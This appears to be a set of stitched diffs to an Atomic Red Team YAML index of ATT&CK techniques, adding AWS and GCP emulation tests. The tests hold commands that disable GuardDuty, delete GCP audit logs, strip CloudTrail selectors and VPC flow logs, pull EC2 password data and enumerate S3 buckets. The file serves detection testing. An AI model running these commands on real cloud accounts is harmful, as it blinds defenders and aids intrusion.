+          description: Name of the specified region
+          type: string
+          default: us-east-1
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
+          default profile using: aws configure"
+
+          '
+      executor:
+        command: |
+          detectorId=$(aws guardduty create-detector --enable --region "#{region}" | grep -oP '(?<="DetectorId": ")[^"]*')
+          aws guardduty update-detector --no-enable --detector-id $detectorId
+          aws guardduty delete-detector --detector-id $detectorId
+        cleanup_command: 'echo "If test successfully ran, no cleanup required."
+
+          '
+        name: bash
+        elevation_required: false
  T1601:
    technique:
      x_mitre_platforms:
@@ -12751,6 +12787,132 @@ defense-evasion:
          terraform destroy -auto-approve
        name: sh
        elevation_required: false
+    - name: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
+      auto_generated_guid: a27418de-bdce-4ebd-b655-38f11142bf0c
+      description: 'Update event selectors in AWS CloudTrail to disable the logging
+        of certain management events to evade defense. This Atomic test leverages
+        a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      - iaas:aws
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1562.008/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if [ -f #{stratus_path}/stratus ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" == \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep Darwin_x86_64 | cut -d '\"' -f 4); wget
+          -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n  tar
+          -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" == \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep linux_x86_64 | cut -d '\"' -f 4) \n  wget
+          -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n  tar
+          -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi\n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+          '
+      executor:
+        command: "export AWS_REGION=#{aws_region} \ncd #{stratus_path}\necho \"starting
+          warmup\"\n./stratus warmup aws.defense-evasion.cloudtrail-event-selectors\necho
+          \"starting detonate\"\n./stratus detonate aws.defense-evasion.cloudtrail-event-selectors
+          --force\n"
+        cleanup_command: |
+          export AWS_REGION=#{aws_region}
+          echo "Cleanup detonation"
+          cd #{stratus_path}
+          ./stratus cleanup --all
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
+    - name: AWS - Remove VPC Flow Logs using Stratus
+      auto_generated_guid: 93c150f5-ad7b-4ee3-8992-df06dec2ac79
+      description: 'This Atomic will attempt to remove AWS VPC Flow Logs configuration.
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      - iaas:aws
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1562.008/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if [ -f #{stratus_path}/stratus ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" == \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep Darwin_x86_64 | cut -d '\"' -f 4); wget
+          -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n  tar
+          -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" == \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep linux_x86_64 | cut -d '\"' -f 4) \n  wget
+          -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n  tar
+          -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi\n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+          '
+      executor:
+        command: "export AWS_REGION=#{aws_region} \ncd #{stratus_path}\necho \"starting
+          warmup\"\n./stratus warmup aws.defense-evasion.vpc-remove-flow-logs\necho
+          \"starting detonate\"\n./stratus detonate aws.defense-evasion.vpc-remove-flow-logs
+          --force\n"
+        cleanup_command: |
+          export AWS_REGION=#{aws_region}
+          echo "Cleanup detonation"
+          cd #{stratus_path}
+          ./stratus cleanup --all
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
    - name: AWS - CloudWatch Log Group Deletes
      auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
      description: "Creates a new cloudWatch log group in AWS, Upon successful creation
@@ -18390,7 +18552,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18430,6 +18592,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -32620,7 +32783,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -32723,6 +32886,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -32751,7 +32915,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32791,6 +32955,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -41844,7 +42009,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41865,6 +42030,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -49600,6 +49766,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -52150,7 +52317,73 @@ credential-access:
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1552
-    atomic_tests: []
+    atomic_tests:
+    - name: AWS - Retrieve EC2 Password Data using stratus
+      auto_generated_guid: a21118de-b11e-4ebd-b655-42f11142df0c
+      description: 'This atomic runs an API call GetPasswordData from a role that
+        does not have permission to do so. This simulates an attacker attempting to
+        retrieve RDP passwords on a high number of Windows EC2 instances. This atomic
+        test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      - iaas:aws
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1552/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if [ -f #{stratus_path}/stratus ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" == \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep Darwin_x86_64 | cut -d '\"' -f 4); wget
+          -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n  tar
+          -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" == \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep linux_x86_64 | cut -d '\"' -f 4) \n  wget
+          -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n  tar
+          -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi\n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+          '
+      executor:
+        command: "export AWS_REGION=#{aws_region} \ncd #{stratus_path}\necho \"starting
+          warmup\"\n./stratus warmup aws.credential-access.ec2-get-password-data\necho
+          \"starting detonate\"\n./stratus detonate aws.credential-access.ec2-get-password-data
+          --force\n"
+        cleanup_command: |
+          export AWS_REGION=#{aws_region}
+
+          echo "Cleanup detonation"
+          cd #{stratus_path}
+          ./stratus cleanup --all
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
  T1139:
    technique:
      x_mitre_platforms:
@@ -57271,7 +57504,78 @@ discovery:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1580
-    atomic_tests: []
+    atomic_tests:
+    - name: AWS - EC2 Enumeration from Cloud Instance
+      auto_generated_guid: 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+      description: 'This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets,
+        iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails,
+        ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors)
+        from the context of an EC2 instance role. This simulates an attacker compromising
+        an EC2 instance and running initial discovery commands on it. This atomic
+        test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      - iaas:aws
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1580/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if test -f "#{stratus_path}/stratus"; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" = \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" = \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i linux_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi
+          \n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
+          default profile using: aws configure"
+
+          '
+      executor:
+        command: |
+          export AWS_REGION=#{aws_region}
+          cd #{stratus_path}
+          echo "Stratus: Start Warmup."
+          ./stratus warmup aws.discovery.ec2-enumerate-from-instance
+          echo "Stratus: Start Detonate."
+          ./stratus detonate aws.discovery.ec2-enumerate-from-instance
+        cleanup_command: |
+          cd #{stratus_path}
+          echo "Stratus: Start Cleanup."
+          ./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+          echo "Removing Stratus artifacts from local machine."
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
  T1217:
    technique:
      modified: '2023-04-16T14:24:40.625Z'
@@ -57800,7 +58104,31 @@ discovery:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1619
-    atomic_tests: []
+    atomic_tests:
+    - name: AWS S3 Enumeration
+      auto_generated_guid: 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5
+      description: "This test will enumerate all the S3 buckets in the user account
+        and lists all the files in each bucket. \n"
+      supported_platforms:
+      - iaas:aws
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          default profile using: aws configure
+
+          '
+      executor:
+        command: 'for bucket in "$(aws s3 ls | cut -d " " -f3)"; do aws s3api list-objects-v2
+          --bucket $bucket --output text; done
+
+          '
+        name: sh
+        elevation_required: false
  T1087.004:
    technique:
      x_mitre_platforms:
@@ -2441,7 +2441,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2468,6 +2468,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -18406,7 +18407,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18446,6 +18447,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -32715,7 +32717,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -32818,6 +32820,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.003
    atomic_tests: []
  T1547.012:
    technique:
@@ -32846,7 +32849,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32886,6 +32889,7 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -41994,7 +41998,7 @@ persistence:
        D. - Defending O365 - 2019)"
      modified: '2022-04-19T14:55:26.110Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Additional Email Delegate Permissions
+      name: 'Account Manipulation: Additional Email Delegate Permissions'
      x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
        permissions changes that may indicate excessively broad permissions being
        granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -42015,6 +42019,7 @@ persistence:
      - 'Application Log: Application Log Content'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1098.002
    atomic_tests: []
  T1084:
    technique:
@@ -49890,6 +49895,7 @@ lateral-movement:
      - 'File: File Creation'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1570
    atomic_tests: []
  T1184:
    technique:
@@ -58146,31 +58152,7 @@ discovery:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1619
-    atomic_tests:
-    - name: AWS S3 Enumeration
-      auto_generated_guid: 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5
-      description: "This test will enumerate all the S3 buckets in the user account
-        and lists all the files in each bucket. \n"
-      supported_platforms:
-      - iaas:azure
-      dependencies:
-      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
-
-          '
-        prereq_command: 'cat ~/.aws/credentials | grep "default"
-
-          '
-        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
-          default profile using: aws configure
-
-          '
-      executor:
-        command: 'for bucket in "$(aws s3 ls | cut -d " " -f3)"; do aws s3api list-objects-v2
-          --bucket $bucket --output text; done
-
-          '
-        name: sh
-        elevation_required: false
+    atomic_tests: []
  T1087.004:
    technique:
      x_mitre_platforms:
@@ -2441,7 +2441,7 @@ defense-evasion:
        description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
          30, 2021.
      modified: '2021-08-31T14:51:47.352Z'
-      name: Safe Mode Boot
+      name: 'Impair Defenses: Safe Boot Mode'
      description: |-
        Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

@@ -2468,6 +2468,7 @@ defense-evasion:
      - Anti-virus
      x_mitre_permissions_required:
      - Administrator
+      identifier: T1562.009
    atomic_tests: []
  T1542.005:
    technique:
@@ -12689,7 +12690,48 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1562.008
-    atomic_tests: []
+    atomic_tests:
+    - name: GCP - Delete Activity Event Log
+      auto_generated_guid: d56152ec-01d9-42a2-877c-aac1f6ebe8e6
+      description: "GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data
+        Access, System Events, and Policy Denied.\nAn adversary may attempt to delete
+        logs in order to hide their activity. However, Admin Activity, System Events,
+        and Policy Deny events logs cannot be deleted. \n\nThis Atomic attempts to
+        delete the Activity Event log. An event is generated under the method name
+        of `google.logging.v2.LoggingServiceV2.DeleteLog` with a Serverity of `ERROR`.\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-project-1
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
  T1564.003:
    technique:
      x_mitre_platforms:
@@ -15284,7 +15326,6 @@ defense-evasion:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -15304,6 +15345,72 @@ defense-evasion:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
+    - name: GCP - Create Custom IAM Role
+      auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
+      description: "This atomic will create a new IAM role. The default role permissions
+        are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies an Identity and Access Management
+        (IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
+        are user-defined, and allow for the bundling of one or more supported permissions
+        to meet specific needs. \nCustom roles will not be updated automatically and
+        could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
+        will create a new IAM role. The default role permissions are: *IAM Service
+        Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        role-name:
+          description: The name of the role to be created.
+          type: string
+          default: AtomicRedTeamRole
+        role-description:
+          description: The description of the role to be created.
+          type: string
+          default: Atomic Red Team Custom IAM Role
+        roles:
+          description: List of roles to be applied
+          type: string
+          default: iam.serviceAccounts.get
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
+        cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
+
+          '
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
  T1480.001:
    technique:
@@ -18299,7 +18406,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18339,6 +18446,7 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
+      identifier: T1547.012
    atomic_tests: []
  T1574.001:
    technique:
@@ -25791,7 +25899,6 @@ privilege-escalation:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -25811,6 +25918,72 @@ privilege-escalation:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
+    - name: GCP - Create Custom IAM Role
+      auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
+      description: "This atomic will create a new IAM role. The default role permissions
+        are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies an Identity and Access Management
+        (IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
+        are user-defined, and allow for the bundling of one or more supported permissions
+        to meet specific needs. \nCustom roles will not be updated automatically and
+        could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
+        will create a new IAM role. The default role permissions are: *IAM Service
+        Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        role-name:
+          description: The name of the role to be created.
+          type: string
+          default: AtomicRedTeamRole
+        role-description:
+          description: The description of the role to be created.
+          type: string
+          default: Atomic Red Team Custom IAM Role
+        roles:
+          description: List of roles to be applied
+          type: string
+          default: iam.serviceAccounts.get
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
+        cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
+
+          '
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
  T1053.002:
    technique:
@@ -32581,7 +32754,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -32684,6 +32857,7 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
